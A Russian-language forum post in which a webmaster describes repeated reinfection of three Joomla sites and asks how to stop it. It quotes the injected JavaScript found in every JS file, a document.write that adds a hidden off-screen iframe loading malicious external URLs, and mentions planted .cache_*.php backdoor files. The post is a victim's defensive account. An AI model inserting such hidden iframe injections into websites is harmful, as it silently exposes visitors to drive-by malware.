Уважаемые.. выловил во все js файлы дописку в конце вида:
;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="
http://ccmxaqt.qhigh.com/3f9b0edf4abf8.try?11" height="350" width="250"></iframe>');
причем ссылка в вредоносном коде рендомно меняется после удаления, т.е убиваю код - через какое то время появляется тоже самое только вместо ccmxaqt.qhigh.com какая нибудь другая ссылка стоит, например так:
;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="
http://cfd.erggaut.com/3f9b0edf4abf8.try?11" height="350" width="250"></iframe>');
==================================================================
нашел сие действо, убил. пришлось ручками все js файлы перелопатить.
при этом: убил ftp клиент полностью, поставил другой, запретил браузеру и ftp клиенту запоминать пароли для входа на хостинг/биллинг/фтп/админку.
+ скачал двиг себе, проверил др.веб лиценз антивирем - ничего не найдено.
+ сменил пароли на хостинг/биллинг/фтп/админку
+ в папке images и подпапках убил все php файлы типа .cache_7qiw7z.php .cache_08trrt.php
+
ПРОЧИТАВ ЭТОТ ТОПИК ОБНОВИЛ JCE до последней на сегодняшний день версии 2.3.1 а то действительно стоял старой достаточно версии..
на следующий день такая же фигня - все дописки вредоносного кода на месте, как и не делал я чего...
как бороться?
сайтов проблемных - 3 шт. в разных аккаунтах хостинга находятся они, в один сайт не заходил с полгода, вообще он не мой а моего знакомого, я просто делал его... Один сайт на Joomla 2.5.8 и еще 2 сайта на Joomla 1.5.26
попросил хостера посмотреть есть ли в бекаппе недельной давности вредоносные коды. их там не было. восстановили бекапп - сутки все было ок, даже Google выкинул сайт из проблемных.
сегодня с утра все снова.. все вредоносные коды на своих местах как и не делалось ничего.. А так же на месте ВСЕ убитые мной файлы типа .cache_7qiw7z.php .cache_08trrt.php ! они то откуда взялись)